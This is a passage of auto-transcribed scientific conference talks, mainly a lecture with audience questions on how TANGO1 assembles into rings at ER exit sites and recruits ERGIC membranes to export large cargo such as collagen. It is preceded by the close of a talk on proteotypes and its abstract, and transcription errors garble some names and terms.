experiments, they're substantially different from the... not from the sequence, but from the copy number variation, namely the number, the ploidy of genes in specific alleles. And I just want to draw your attention to this picture here. This is two of these chromosomes where we see hot is always high number of ploidy, green is a low number of ploidy, and we see that there's very large blocks of regions, which are amplified in these cells or not amplified. So it's kind of a green and red block. When we go to the transcripts, this gets already somewhat diffused. If we go to the proteins, it gets very diffused. So the effects of this increased ploidy or decreased ploidy is interpreted by the cell in extremely complicated ways. And what I do not have the time to show is that the organization of these proteins that are coming out of these increased ploidy regions into modules is a big buffer. It's one of the most dominant factors, how the cell modulates the abundance of proteins that are induced by a higher number of copies of a particular gene is the organization of these proteins in a complex. So if a protein is known to go into a complex and the other subunits are not also augmented, that protein is buffered down and is basically degraded. So that's why this one mechanism, not the only one, that these copy number variations are interpreted by the cell or lead to very, very refined and actually strongly buffered landscape at the level of the proteins and therefore at the physiological relevant proteins. So with that I would like to finish and try to show that, or this is the topic of this morning, that we can measure now with amazingly effective tools a lot of genomic variability from very large cohorts, thousands or tens of thousands of individuals. We have lots of phenotypic information and the way we bridge this, I believe, needs to involve proteins, not just the abundance of proteins, but also their modularity and I think if we can make more headway into basically defining by measurements this quantitative prototype will have a much better situation to link genotypic variability to phenotypes. So this is my, the collaborators whose work I showed, this last part I skipped largely is the work of Jan Scheglou, together with Wolf Hart who is a colleague at ETH. The DERC II project is work from Martin Miener, the postdoc, and this BXD project is work of Evan Williams and Yipovou, two postdocs, and we work with the group of Johan Owerks at EPFL who created and maintains this BXD mice. Thank you for your attention. Thank you. May I have time for a quick question also? Yeah, so I'd like to go back to the list of principles you showed in the beginning and about the predictability of complex systems. For instance, oscillations and cell cycle are typically the best predicted and I think they are predicted because what has been modeled is the regulatory layer. So engineers distinguish between, in any complicated system, distinguish between a regulatory layer or a control system or auto-regulatory system and the basic core process in the physical cycle we have now, I mean, spindle and so on and so forth. And in each module, either in a complex man-made machine or in biological machines, it's possible to distinguish a plant or a basic plant, manufacturing plant, a plant and the control system. And engineers distinguish between those two components. It's relatively possible, let's say, if not easy, to understand the module, the control systems, if we can, if we work them out. This goes back also to what I tried to show this morning when I spoke. Once you have identified the modules and the regulatory systems, as I said, it's not hugely complex. It's possible to break down the complexity of the overall system, the cell of the organism into modules and the regulatory system and the coordination among them. So this will be, I think, a way in which we could maybe try to predict complex system by breaking down the complexity of the module and into the regulatory layers. This is what the engineers do, basically. Yes, I agree with that. And I think this is certainly the goal. The problem is that we are now reasonably good, not perfect, reasonably good in determining the modules that actually do the work, but the control system we don't really know enough. That's exactly the point. And so I think it will be, so we have transcription models, which is one level of control. We have microRNA control, we have translational control, we have phosphorylation control. I think the analysis needs to start from a function and understand what is the control machinery, the control lab on that function. And this is, not that, it's very neglected in cell biology. Yeah, I think this is true. However, it's also very complicated because it's not a single level of control that controls the system. It is many that contribute to the control of the system. So that's why I think that we should work towards figuring out these control mechanisms, of course. But in the meantime, for, I think, foreseeable future, we are limited to, or better off, if we do measurements and basically take the point of view, the cell knows what control systems to use and how these control systems are used to control a particular process. And if we can make a readout that reflects all levels of integrated control, then we would be able to make a better prediction. So this is a surrogate for having a series to do, let the cell do the work and do measurements which are close to determining the field. I agree on the rules, but not on the method. Okay, we can discuss it. One more question. One more question. Woman. I wanted to ask if you think about this prototype as quite stable besides the non-genetic mutations, like transcriptional noise or epigenetic events. So do you think this prototype is quite stable or dynamic configuration? So it is quite stable, it seems. I mean, we are not able to make measurements, of course, at a single cell level. So we always measure aggregates over a certain number of cells, which can be good or bad, we can discuss that, but maybe not here. But in under specific conditions, the prototype is actually quite stable. But it is also strongly reactive, it always reacts. I mean, you know, I try to show with this mutation, even a mutation somewhere in the protein, a single amino acid exchange, in this two kinase, has an effect on the prototype, which is actually noticeable. This is quite remarkable. It's a very sensitive readout, but it is inherently quite stable because through mechanisms like, for instance, the buffering of transcriptional variability at the level of the modules that really matter for the function. So this is what I had to skip over. We'll have to stop now. Let's go for a break. Thank you.
|
The question how genetic variability is translated into phenotypes is fundamental in biology and medicine. Powerful genomic technologies now determine genetic variability at a genomic level and at unprecedented speed, accuracy and (low) cost. Concurrently, life style monitoring devices and improved clinical diagnostic and imaging technologies generate an even larger amount of phenotypic information. However, the molecular mechanisms that translate genotypic variability into phenotypes are poorly understoodand it has been challenging to generally make phenotypic predictions from genomic information alone. The generation of a general model or theory that makes accurate predictions of the effects of genotypic variability on a cell or organism seems out of reach, at least for the intermediate future. We therefore propose that the precise measurement of molecular patterns that best reflect the functional response of cells to (genomic) perturbations would have great scientific significance. We define the term “proteotype” as a particular instance of a proteome in terms of its protein composition and organization of proteins into functional modules. In the presentation we will discuss recent advances in SWATH/DIA mass spectrometry that support the fast, accurate and reproducible measurement of proteotypes. We will show with specific case studies that i) the proteotype is highly modular, ii) genotypic changes cause complex proteotype changes and iii) that altered proteotypes affect phenotypes. Overall, the presentation will introduce the proteotype as a close indicator of the biochemical state of a cell that reflects the response of the cell to (genomic) perturbation and is strong determinant of phenotypes.
|
10.5446/50909 (DOI)
|
So, alright, so I must admit, I have to thank the organizers and I think Navam and David must have played a key role in putting my name up for this discussion. So I'm going to try to keep it very simple. I wasn't sure whether this meeting is going to be filled with students and post-docs or is it just the senior scientists. So I'm going to try to present to you what we publish and I really like to get to the point where I'll present stuff that's not in print yet. So this pathway of protein secretion that I have projected here on this slide is an old process. It sort of goes all the way back to the days when George Polari for the first time in the 60s and in the early 70s presented from his analysis the path taken by a protein which is to be secreted and the proteins that have to be secreted by the cells begin their life in the endoplasmic reticulum. They are then transported to the Golgi and from Golgi they then make their way out of the cells. And his major thesis was that these transfers between compartments ensure the compartmental identity. So when you want to take something out of the ER you take it selectively. You leave behind the residence and you take the cargo to the next station and you go on sorting these proteins. Till you get to the stage where you have determined that some of the proteins have to be secreted the other ones might have other centers in the cell where they have to go. So that was in 1974 and for the last 40 years of so or 50. A lot of people have worked on this process to gain an insight into how cargos are sorted in the endoplasmic reticulum, how they are packed into a kind of vesicle that has been monocled or termed COP2 vesicles and these vesicles will bring the cargo into the Golgi. Now with the Golgi the cargos are transferred in the forward direction but proteins that need to be recycled are brought back by means of COP1 vesicles. So COP1 is a class of vesicles in fact that I had purified with Jim Rothman in 1989 and these vesicles were identified in 1992 hence the one versus two. So there is still a lot of doubt in the field even after 40 years of work whether the traffic in this forward direction is mediated by vesicles or is it simply a process by which this cisterna of the Golgi matures. By mature I mean proteins that need to be returned are being extracted while material that needs to go forward keeps moving. And this becomes particularly important for molecules that are far too big to fit into the class of vesicles such as COP1 and COP2 and these class of molecules are collagen musins, chylomicrons, PLDL particles and I'll talk about that today. So you know it has been said by a few that we have almost all the information that we need for this particular pathway of transport and I tend to differ. I disagree completely. I think we just have the nuts and bolts of this process. Most of our understanding in how cells compartmentalize and how cells secrete many of the proteins, the signals, how you control the organization of the compartments when the cargos are being moved back and forth is completely unclear. And this is what my lab has been trying to address for the last many years. Now my talk is going to depend and describe a lot about COP2 vesicles which form at the ER. So I think there is a need for me to present our current understanding of what a COP2 vesicle is and how it forms. So you need a set of about six polypeptides. And this is mostly the work of Randy Schechtman and Bill Bolsch and colleagues. So what happens is a protein called SAR1 which lives in the cytoplasm in a GDP bound form interacts with Sec12 which is a transmembrane protein of the endoplasmic reticulum. This will change GDP for GTP and when that happens this protein SAR1 exposes an amphipathic helix which inserts into the outer leaflet thereby bringing this protein into the ER membrane. SAR1 GTP then binds to a dimer which is made up of Sec23 and Sec24. Now there are different isophones you needn't worry about that at this stage. Now this dimer has the potential or the ability to start collecting cargos. So Sec24 has the ability to bind to receptors which can then bind to soluble secretory cargos. So this is a way to collect material in the lumen of the endoplasmic reticulum and connect it to the inner layer of the COP2 codes. Now the binding of this dimer to SAR1 and once the cargos are associated then recruits another dimer which is made up of Sec13 and Sec31. So there is only one isoform of 13 but there are two of Sec31. Now this binding of this dimer to Sec23 and Sec24 what it does is it starts turning off this process or terminating this process. So Sec31 has the capacity to increase the GTPase activity of Sec23 thereby converting SAR1 GTP back into GDP and when GTP to GDP switch is made that basically is the signal for the cells to terminate the production of this particular container. And so what happens is a COP2 coated vesicle then emerges from the endoplasmic reticulum and it can be then targeted to the Golgi. Now these vesicles COP2 shown here and COP1 shown here they've been purified, they've been studied extensively. Hello Tommy. They've been studied extensively for the last 30 or so years and we know a lot about them. So almost all the components of these coated vesicles have a role in protein secretion. But there is a common feature here that is worth mentioning and the feature is to do with the size of these vesicles. They are about 69 meters in diameter and they look very homogeneous in size. Now this is fine for most of the proteins that are being secreted by the cells especially if you happen to be saccharomyces or VCI but we buy bypads and mammals and make a lot of proteins that just cannot fit into these vesicles. So for example, collagen. So there are 28 different types of collagen that you and I make now and you need them for almost every cell cell interaction. Without the collagen you will not have bones to begin with. You will not have skin. Now the problem with the collagen is that they contain a very rigid triple helical region which in the case of collagen 7 which is absolutely necessary for the formation of skin can be up to 415 nanometers in length. And this is really like a rod. There is no force inside the cell that can bend this rod into a structure small enough that could be encapsulated into a coptovascular. So the question then becomes how does a cell which need to secrete collagen and believe it or not that collagen composes 25% of your dry body weight. So these are the most abundant of the secretory cargos. So the question then becomes how can a cell export something so big by using a vesicle that is only 60 nanometers in diameter. Now similarly cells of the liver and intestine secrete chylomicrons and very low density lip proteins. These are basically lipid droplets coated with specific proteins and they are secreted and their job is to scavenge or transfer cholesterol and triglycerides in circulation. And again these can be huge structures and they cannot be accommodated into a coptovascular. So which are big droplets? Big as 100 to 150 nanometers. But remember you are not secreting one droplet at any given time. You are secreting many of these. So the question then becomes how can a structure that is only 60 nanometers contain many of these. Now finally to get to another point we produce about a liter of mucine per day which is absolutely necessary for the lining of your epithelium all the way from your nose to the very end and its job is to protect the underlying tissue from pathogens. And there are 21 different kinds of mucine genes. Again huge molecules and you make a liter of mucine per day and these are again far too big for to be transported by coptovascals. So the question is how are the cells transporting these molecules because they are certainly very very important for our physiology. So over the number of years I was running into 10 years and I must admit Alberto Luini is sitting here so he should be credited for rekindling a field of biology and it was Alberto's paper in 1998. In fact I was visiting his lab at that time which highlighted this issue of how the current understanding of that time meaning copto mediated vesicle transport just couldn't explain how collagen are transported because they were just far too big. People had just simply ignored this issue and challenged people would just say well there must be some variants of copto and copfone vesicles that can do this job. But it turns out that it is not so simple. So many years ago we performed a genome-wide screen in I think 2005 or 2006 in MetaZones and we looked for new proteins that have not been assigned a function in the secretory pathway and we isolated lots of genes that were new in this business and we called them Tango for transport and Golgi organization because I'm also fascinated by the structure of the Golgi and how it forms and breaks and is partitioned into daughter cells. So Tango one is the protein that I'm going to describe to you today very briefly. It's a very large protein. It is a protein of 1907 amino acids. Its N-terminus is in the lumen. Its C-terminus is in the cytoplasm. In the cytoplasm it has a proline rich domain, two coil-coil domains. In the lumen it has 900 amino acids which are not depicted to the scale here which are unstructured and they turn out to be very, very important for the overall process by which cargos are exposed. And again if time permits I will gladly discuss that. It has a coil-coil domain and an SS3-like domain at the very N-terminus. So we had shown that the SS3-like domain binds collagen and we had shown in 2009 that proline rich domain binds to Sec 23. So this gave us the reason to believe that this protein must have a role in trafficking. And when Kota Seito was in my lab he was also able to show that Tango one, so this is endoplasmic reticulum, Tango one localizes to very discrete sites at the ER and these sites happen to be the ER exit sites. So these are places where cargo is collected and then this is where you generate transport carriers which will then move the carriers from the ER in the direction of the Golgi. So Tango one binds to Sec 23, it binds to collagen and it localizes to the ER exit site so the thinking would be that it must have a role in the export of collagen. And the answer is yes it does. So if you knock down Tango one by SIRNA, now of course one does CRISPR but this is 2009, 2010, there's about an 80% reduction in the amount of collagen. Here I'm showing you collagen type 7 that is secreted compared to the control and there is a concomitant increase in the intracellular pool of collagen which is found arrested in the ER. This is just a quantitation of this process and this is just to show you the level of knock down that we can achieve by this particular procedure. So this told us that Tango one was required for collagen type 7 export from the cells. Now soon thereafter I was very pleasantly surprised that friends of people that I had been in contact with, Andy Peterson and colleagues at Genintag, we were trying to generate them. We were able to generate a mouse knockout of Tango one but we are not very good mouse geneticist and we lost to our dear friends. They were able to create this mouse knockout. So Mia 3 is the same as Tango one, it's just a different name for it. So they were able to generate a mouse knockout for Tango one and what they found was that the mouse dies at birth. It dies at birth because it does not have any mineralized bones. So the bones are really like rubber and in fact many of the bones are missing. And so it dies and it has this defect because it fails to secrete many of the collagen that looked at 1, 2, 3, 7, 9 and 11. So this therefore gave us the hope that A, Tango one has a role in collagen export and B even more importantly it is not just collagen type 7 that we had studied but many of the collagen that most likely follow the same pathway. And this also gave us the confirmation that whatever we have been doing in tissue culture system has an in vivo physiological significance therefore time to dig deeper into the problem. And that by deeper I mean how does Tango promote collagen export and this is where we've made some very interesting findings. So it turns out as I told you earlier the proline rich domain binds to cop to coat sec 23 that's what we had shown before. I'm going to show you well I'm going to show you the work of ours and the others that the SS3 like domain binds to cargo and I'm going to show you our work that this particular domain here is required for recruitment of membranes. The point being that the mechanism by which Tango one generates a big transport carrier that you need is not simply by collecting membranes from the ER and creating a transport carrier it's a completely different mechanism. So we had shown that this part binds to sec 23 but Jonathan Goldberg two years ago quietly published a paper well not quietly he published a paper in 2016 in PNAS in which he was able to co-crystallize parts of tangos PRD with sec 23 and what he found was that these parts contain triplex of proliens and Tango one contains seven such triplex of proliens and it is this particular it's these particular proliens that bind to sec 23 so he was able to narrow it down to the mechanism or the structural aspects of how Tango will interact with sec 23. So this is great confirmation for us and very valuable for further dissection of this process and in the same year what Hans Peter Buckinger found and reported that the binding of SS3 to collagen that we had proposed and reported is not direct but it is mediated through a protein called HSB 47. So this solves a problem again for us because as I said there are 28 different types of collagen so it was difficult for us to envision how would this particular protein bind to all different collagen this therefore acts as a as an acceptor. Now I should also mention that while HSB 47 is an acceptor for collagen type 7 and many others there are collagen that do not interact with HSB 47 but they interact with other chaperones and so our thinking is that this protein can interact with collagen through different molecules and not all of them have to work through HSB 47 but in principle the connection between collagen and Tango is mediated by a connector in between which is in the case of collagen type 7 at least HSB 47. And you know all of them yeah? We don't know all of them but we know for a few of those. You know again it will become a detail I mean I think the principle is has been established through a specific. This one is very specific because you know how it works again I don't know how I'm going to run a time you know the collagen primers start at one end and as they are folding these proteins start binding they bind in fact Nagata had previously supported the idea that these were chaperones for folding and that turns out to be not true. What they do is they bind to the fully folded part and as it is being zipped as it is being folded this binding increases. So I think this interaction brings to this particular molecule the part that is folded. If I have time I'll try to explain to you how this unstructured part and this one works together to only collect fully folded collagen for export. So this was again a great piece of confirmation for us. Now so the question then becomes you have very big molecules and need to export them so how do you do it? So one possibility is that in order to make a big transport carrier you need more membrane. So one possibility is that if you use a cop to code so the idea is that if a cop to code needs to make a small vesicle it assembles into a small structure and then it pinches okay and you get a membrane that's about 60 to 90 nanometers in diameter but if you want to make a big one all you do is you make a very big code you instead of using a handkerchief to collect this much material you throw in a big towel you know just collect big membranes. Would that be the way to generate a transport carrier? The alternative so this is basically it right. So if you want to make a vesicle of this size you have a code structure let's assume 100 nanometers by 100 nanometers okay but if you want to make a big structure to carry collagen the size of the code is huge but I'm going to tell you that this is not how the structure is generated. The reason for that is that we looked at a patch of collagen so this is looking at a patch of collagen which has not left the ER yet and these gold particles are gold particles to show that we're looking at collagen. It is huge okay this is about almost reaching about 500 nanometers. Now we expected so red here is the same as this one is collagen and the green structures you see are copter codes it doesn't matter whether you use sec 23 or sec 24 okay so I expected to see a complete area here covered by these green structures so instead of seeing this punctate elements I expected to see a sheet of code on top of these structures and we did not see that so this made us think that perhaps there is a different way to generate this mega transport carrier and Antonio Santos when he was in my lab he made a very peculiar observation he found that when collagen are about to leave the ER here again shown in red these structures seem to be studied with membranes that contain a protein called Ergic 53 so what is Ergic 53? It is a compartment or it's a collection of membranes in between the ER and the Golgi and their job seem to be material coming from the ER comes as far as Ergic 53 compartment and then they go back okay and they go back mostly by cop on vesicles what becomes of Ergic 53 is still kind of unclear so you can call them Ergic 53 containing membranes or you can call them cop 1 vesicles that contain Ergic 53 it doesn't matter so ordinarily we saw or Antonio saw that these membranes were tightly opposed to collagen patches but if you look at cells from which kind Tango 1 has been deleted these membranes are still there but they're not attached to patches of collagen so this made us think that perhaps these membranes are being recruited by Tango and their fusion is their fusion to these membranes or these patches is what is providing the extra membranes required for generating these big structures so I'm going to come to that but I just want to highlight what is this particular region of Tango which recruits these membranes so we were able to pin it down to a stretcher for amino acids about 150 amino acids from here to somewhere in between to the middle of the coil called first of Tango 1 and we call this domain tier which stands for tether for Ergic at ER so what you can do is you can take these 150 amino acids of Tango 1 and put it at the mitochondria artificially and when you do that the Ergic membrane simply go to the mitochondria so instead of coming to the ER they simply are diverted to the mitochondria so this told us that this part has the capacity to recruit Ergic membranes and so we can now this is not published but we can now keep on cutting this structure into smaller and smaller pieces and it turns out amino acids 1255 to 1296 of Tango 1 have the capacities it's about 50 amino acids so we take this 50 amino acids and put them on mitochondria then Ergic membranes go to the mitochondria if you put them on plasma membrane then Ergic membranes go to the plasma membrane. Remember it's lipis plus proteins. Yeah. You know which proteins being actually involved. I'm going to tell you that just you're too quick it's a bit early for me but yeah I'm going to get to that point yeah so I'm just trying to tell you that there is a mechanism built into Tango which has the capacity to recruit Ergic membranes okay and we can narrow it down to 50 amino acids now and we can use this 50 amino acids as a peptide to inhibit collagen secretion to be quite honest with you. It's very simple and it turns out the first Coil-Coil domain that I showed you is not just one contiguous Coil-Coil domain it is made up of three Coil-Coil domains and the tier domain is this part here which is made up of these many amino acids so this tells us that Coil-Coil domain I initially thought would be a rod like structure but it is made up of three bits that can bend okay. Now the idea then is that this part here can recruit Ergic membranes they fuse and their fusion and rapid built into the structure that is growing out is what creates a mega transport carrier but is there any evidence that these membranes fuse to the ER and the answer is yes. So fusion requires these specific proteins called snares they have to assemble at the site where a vesicle is fusing with the target membrane and we know a lot about these proteins so I'm just going to simply run through it so it turns out there are three T snares and one V snare V is for vesicle and T is for the target membrane so we were able to show that the T snares syntax in 18, USC1 and BNP1 were required for export of collagen from the endoplasmic reticulum. Tango 1 of course is necessary because it acts as the receptor for collagen okay. Syntaxin 5 is not a surprise because if you knock down this particular snare then there is no gull-cheaper say and therefore the end product would be a defect in secretion okay. Now if there are T snares there must also be a V snare there are many V snares that work at the ER gull-cheaper but the point to remember here is that YKT6 this one if you remove that from the system then collagen export from the endoplasmic reticulum is blocked whereas knockdown of BNP1 and sec22B has no effect okay. So this told us that the membranes that are being recruited to the ER exit site via the function of Tango 1 do fuse and it is their fusion that is necessary for the export mechanism. Now I have to sort of go through this model building a little bit in order to explain the data. So what we propose is the following that in the lumen of the endoplasmic reticulum the SA3-like domain through HSP47 lumen is the inside of the ER inside of the ER it's a container right ER is a membrane bounded compartment so it will have a lumen and it will have a face that is on the size of that's the cytoplasm. So in the lumen of the ER this SA3-like domain binds to collagen and this binding we propose initiates the interaction of the proline which domain to sec23 and this is how this reaction starts. Now at this stage we propose and this is fictional and this is something that we are trying to address now in the lab that there is a mechanism by which collagen is being pushed into a structure that is growing on the cytoplasmic side okay. Now this pushing is probably mediated by SA3 domain through HSP47 which might just be sort of walking on the collagen as it's assembling okay. This also relies on collagen having a binding partner here because if you have a container that is growing and this part is anchored and this is not it's going to do this so it helps if it is anchored and we don't know what this anchoring mechanism is but we think it might be that it is anchored to integrins as they are leaving the ER. Now based on the fact that there are two coil-coil domains and the coil-coil domains can extend up to about 40 to 50 nanometers we propose that a bud can be created through this interaction alone which would be about 40 to 50 nanometers but still not sufficient to grow a structure to commensurate with the size of the collagen. Now what is your green spatula? Is this a patch of membrane? These are copter coats. This is the membrane. But the membrane which has been added? Well it's coming to that. I'm going to up to this stage we think there is no membrane added here okay. Now this also we propose that if this is true then tango should be a ring. So if you imagine this in three dimension then tango would just basically circle the ring, circle this structure as a ring perhaps at the neck of the transport carrier that is coming out of the ER. And one day lo and behold Ishir who really is probably one of my best postdocs ever in the last 30 years comes up to me and he says Vivek I have data tango one assembles into a ring at the neck of a structure that is coming out of the ER. And by a ring he means this. So this here in green is tango and red in the middle as you see are copter coats. And it turns out that if you were to look at is if this is the ER this is the structure that's coming out this is the lumen this is where the collagen is and it's dripping on my palm the liquid. The collagen would be inside tango is a ring here okay. And this is the membrane and the coat the cops would be in the middle. So this is quite fascinating because what it tells us is that tango has a capacity to form a ring assemble into a ring and the cops are in the middle and the structure is going to grow in this form here. And this is about 300 nanometers but we have data now that this can be made to shrink and expand based on the dynamics of tango. Now at this stage. Well I think tango is not stretching like N2C terminals it's basically assembling laterally into a ring like this. Just one. It's just a polymer. It's just give me a few. It's a polymer. It's a polymer. But it's not a homopolymer. It gets complicated. So at this stage we propose that these membranes, Ergic 53 containing membranes are being recruited which will fuse here through the action of the snare mediated pathway. Now as these membranes fuse. You had asked earlier someone had asked earlier how does this tier domain recruit or what does it bind on these particular membranes here. So most recently this is a paper of us that just got accepted this morning. What we have found is that if this is a ring of tango the red dots that you see here are in fact a set of tethers. There are three proteins. They're called the NRZ complex. It's a detail. But basically tango through tier domain recruits these tethers and these tethers then recruit the Ergic membranes. And it really is quite spectacular because we find these tethers usually either on one side of the ring or at most at the opposite pole. So I think what might be going on is that one half of tango ring and another half of tango ring somehow is brought together and it's at these nucleation sites. The sites where the tethers are and they do like this and you end up with a full ring. So you have a complex of tethers here and you have a complex of tethers here which then recruit Ergic membranes. And so this is a picture that we don't, nobody in my lab wants to do microscopy. We've been blessed with an absolutely wonderful microscopy facility. So by using super resolution microscopy we've finally been able to capture images of a ring of tango, Ergic membranes and the tether. So this just shows you how this whole complex is brought together. So these are the membranes that would be fusing in this domain to allow the structure to grow in size. Now once these membranes start fusing this structure is going to grow and it grows to a size which is large enough to encapsulate collagen. Once the collagen has been placed into this container the SS3 domain dissociates from the collagen molecules. When this dissociation takes place the proline rich domain dissociates from SEC23 which allows SEC1331 to bind here. This binding initiates this GTP hydrolysis cycle that has been suggested long time ago which would then in principle at least cut the membranes here to now create a big transport carrier as shown in this reaction. So this therefore is a working hypothesis of how we believe tango can promote the capture of specific cargoes and allow the cells to create by recruiting other components a mega transport carrier from the ER. So it is in principle different from how a COP2 vesicle is generated. But it is not going to be as simple as we have been saying because it turns out that tango has other family members so this is a full length tango. There is another protein that has been identified it is called tali or it is also given the name mya2. So this protein turns out to be present only in liver and intestine. And we have shown that just like tango is required for the capture and its export of collagen, tali in the cells that express it is required for the export of kylo-microns and VLDL which are again very big particles. So it is similar principle but there are slight differences. It is not the same but it is a related protein. They have the same domain structure meaning it has two coil-coil domains in the cytoplasm, it has a proline rich domain, it has an SS3 domain. But tali lacks this luminal coil-coil domain. Now it turns out that tali is spliced to give rise to two proteins, a protein called C-tage 5 which is expressed in every cell type. So C-tage 5 and tango short form a complex and there is also a splicing of tango 1 to generate a protein called tango short. I should have written it here but it is not. So the ring of tango that I showed you is composed of tango 1, C-tage 5 and tango short. So it is a polymer of three very related proteins. Now in certain cancer cells this protein mea 2 which is basically a part of tango and tali where you cleave here. So you have the luminal part which has the capacity to bind collagen. This is secreted. And when it's secreted there are groups who are working on this. Their thinking is that this can sequester collagen in the extracellular matrix and by sequestering collagen what it does is it prevents the assembly of ECM and because it prevents the assembly of ECM you have the possibility of promoting metastasis. We are not working on this. So this is just to show you that there is tango 1 which has the capacity to bind to cargos, there is tango short which is just like tango 1 but it cannot bind the cargo and there is C-tage 5 which is again related to tango but it cannot bind the cargo. The three of these proteins are usually found in a complex and a lot has been known about which part binds where etc. So those details are available. Each one of them is required for this exit of collagen? Well this tango is absolutely necessary. If you don't have these ones there is a defect and I think it's simply because what they might be doing is to provide the proline rich domain which has the capacity to interact with sec 23. So instead of just providing monovalent interactions what you're doing is you're increasing the valency so you increase the affinity. Now here it gets a bit complicated. So I've told you that you generate a transport carrier of this kind, big structure that leaves the ER and takes collagen to the Golgi but you know no one has been able to visualize these big collagen containing carriers except one report and if the time permits I'll be happy to go over what that means. So is it possible that when collagen are being pushed through the function of tango and associates into a structure that is growing? What happens is this structure here at this end fuses to the Golgi cisterna and if it were to fuse to the Golgi cisterna prior to the fission here what you will end up with is a kind of conduit, a tunnel between the ER and the Golgi and the collagen would basically simply go across the channel it's like Calais to England the trains are going across and there is no transport carrier per se. Once the collagen have been transferred then you cut here and once that structure is cut it's simply absorbed into the first cistern of the Golgi. So this basically means that there is no specific transport carrier per se what you do is you create a tunnel for a short term which allows cells to push these kinds of big molecules from here to here. And the first cistern of the Golgi which then contains collagen just keeps moving forward and this is what cistern maturation is all about. This structure again doesn't need to then pick collagen into a big transport carrier move it to the next one, next one, so on and so forth. So what happens is as the collagen leaves the ER it is already in a cisterna of the Golgi and the cisterna can simply continues to mature because there is no other tango like molecule in the secretory pathway. They're all at the level of the endoplasmic reticulum. So this also helps us understand how there is no further sorting of the molecule once it has left the endoplasmic reticulum. So we are really keen on this model and we are testing this extensively. Now you might ask how many collagen would be secreted if this was the case we've been able to do some calculation with Matthias Mann and Ben Glick put together. So it turns out there are about 40,000 tango one molecules in cells that secrete collagen. Their number of ER exit sites is an estimate but it's between 200 to 400 in mammalian cells. So from this we calculate that there are about 100 to 200 tango molecules per ER exit site. And since each tango one binds to one collagen trimer this allows us to guess that there could be 100 to 200 collagen trimers exported per ER exit site which is this. So this gives us an estimate of how much collagen because these as I said to you these are the most abundant secretory cargos. They have to be secreted in huge amounts and very fast. So this might be. So but you still have a problem going through the Golgi spine but because you have these tunnels and the maturation how do they get out of the Golgi to the plasma membrane? Well the same cisterna when you get to the last one it has nothing but just collagen. Oh so it fuses as a cisterna not as a... So there are no vesicles coming. But here they are making it a fusion. Sure of course for every structure that has to fuse there will be fusion components. If you do an ER Golgi certification on cells that are active secreted in collagen. Do you now pull out Golgi apparatus on the ER fraction? It's very hard to do that Tommy but the best is to do this life cell imaging and this is exactly what we are trying to do. You know we spend years purifying Golgi's and you can never ever get first of all a pure Golgi. There's always some Golgi in the ER fraction and there is always some ER in the Golgi fraction. So that wouldn't work. What do you think would be the transfer? So in chondrocytes the export of collagen from the ER to the outside is like in five minutes. It's the fastest. So if you would lock this cell... We are trying to find that way to lock the electron microscopy. Electron microscopy. You would trap the intermediate. So we are trying to do that. We are using tangos bits and pieces where you allow it to latch onto the copper codes but they cannot come off. So we think we might be able to see these connectors. But you need a transport... Sorry, you said that there are like, I don't know, how many hundreds of events per minute, right? So if I would just snapshot the cell and do a 3D EM, I should see the connectors. Do it. We are looking for someone who I would love to. I mean this is exactly what we would like to do. Why do you invoke the need for connectors as opposed to creating a vesicle that then fuses? We haven't seen it David. I mean, you know, we've been searching for years and so has the whole field to see. There are vesicles that have been seen in post-Golci events. But it isn't clear whether they are vesicles or they are just cisterna. I mean Alberto might have more on this if he's going to talk about it. But we have never been able to see something that separated from the ER and is en route to going to the Golgi. We have seen collagens that are separated from the ER in big structures, but they are not going to the Golgi. They are going to the lysosomes for degradation. Maybe there is another question. The key to those experiments will be to have the right cells and cells that are actually actively secreting collagen. Because a lot of the models are cells that are probably not very active and probably that's why you haven't seen it. So dermal fibrovas... So we do it in R-depp cells. R-depp cells are the best cells for studying collagen type 7 because they produce... These are the skin cells. So they produce carcinocytes, lots of collagen. So if we cannot see them there, then there is... R-depp. These are the cells of patients with epidermalysis bullosa. So they are producing gobs of collagen. So let me just... I mean, again, we can... Okay. With this, what you are losing is the directionality that is normally given by physical attractorism. Well... How do you see the directionality to be given here? Well, yeah, there are issues. I agree. I mean, one possibility is that this binding and pushing mechanism is what is responsible for the directionality. I mean, I was thinking you might ask, well, things... Other things would leak out. Yeah, calcium. Yeah, but the thing is that you could bring them back. I don't know. Calcium? No, calcium... Calcium, you might be able to pump it out. There are circa channels, the SPCA channels at the Golgi. They can take care of that if the need be. I don't know. I mean, I... Do you think your disorder domain is importantly making some sense? Yeah. So, okay. God, you guys are... I will need more time. I think we have to figure out that Tango1 has 900 and 8 amino acids that are unstructured. They bind to collagen weekly, but there comes a time when the binding becomes very tight. So, we think the SH3 domain binds to HSP47 and as collagen is assembling, the unfolded part is bound to the unstructured part. And this unstructured part simply separates into... It undergoes phase separation. We're doing this with Tony. And this is responsible for the directionality and pushing. So, it's all coming together, but we're not quite there yet. That's why I'm just trying to present to get your feedback. Anyways, so, unstructured part... The lipids? The lipids... No, lipids, I don't think I will get into the lipids. We have no way of knowing. I mean, we still don't know the lipid composition of a cop-1 or a cop-2 vesicle. So, going there would be... I would need another lifetime. Now, let me just... I just want to come to a few more things before I leave. So, you know, we are good at doing... I think we are reasonably good at doing what we do in the lab, figure out tango bits and pieces. But, you know, we are also getting very excited about the fact that ourselves and the others are trying to see if we can use inhibitors of tango to control fibrosis, which is hypersecretion of collagen. So, this group at Myoclinic, in fact, has been able to, at least in a mouse model, what they do is they can induce liver fibrosis by using bleomycin. So, what they do is they knock out tango-1 in the liver and then treat the mouse with bleomycin. It doesn't develop a fibrotic tissue. So, there is a way to do this, and we are collaborating with people where we can deliver RNAi and CRISPR tools for tango to direct them directly to liver to see if we can control in mice, not using this approach by... but better approaches. So, there is a potential or perhaps a possibility that we might be able to attack the issue of fibrosis for which there is absolutely nothing you can do at this stage. Now, this is the lab, but this is... Fred Bard started this whole screen of tango genes. He is here now. Kota Saitho is the one who decided to work on tango-1 from all the 74 tangos that we had, and I'm thankful to him. He is at Tokyo University, and as of last week, he's now been made a full professor at Akita University. He's probably one of the youngest professors there. Patrick, Christina and Antonio post-docs, they were the ones who showed that tango recruits ergic membranes to collagen patches, so this really is a new way of thinking how big transport carriers are generated not simply by acquisition of membrane by coats, but by addition of membranes. And Isheer Maria and Felix. Felix is a physicist in the lab, and they have figured out how tango assembled into rings. Now, I have a few minutes left, so I just want to run through a few experiments. So now we know what part of tango interact with cop-2 coats, what parts of tango interact with C-Tage-5 and tango short and tier domain, et cetera, et cetera. So we start asking a very simple question. How does tango assemble into a ring? So again, by modeling this process, what we are proposing is that tango should be, so this is blue is tango, and this color, yellowish-brownish color, are the cop-2 coats. So the cop-2 coats are being corraled by tango, and we say 